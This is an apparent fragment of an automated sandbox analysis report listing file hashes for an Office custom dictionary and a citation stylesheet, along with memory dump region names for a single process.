MD5 b5571b930ae7048b8dd0a015ff940c54
SHA1 7b54ab2c1210a0b609d51ef04d4b70327e638503
SHA256 e419717843023498c099bb2eb833f81c6f55cf3f9d83a98f0b7cf0d7a483a9d2
SHA512 48096e5b10003ee38939912a4c93bc17103dace6bbc12d27dcce85ddbc0fc7e72e16edde95dd195bf77aa716c3f6b834c4e52aa9029962dbcf5d88495dff536e

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2640-83-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-85-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-84-0x00007FFD9C44D000-0x00007FFD9C44E000-memory.dmp

memory/2640-86-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDE59A.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

memory/2640-595-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-596-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-598-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-597-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-599-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp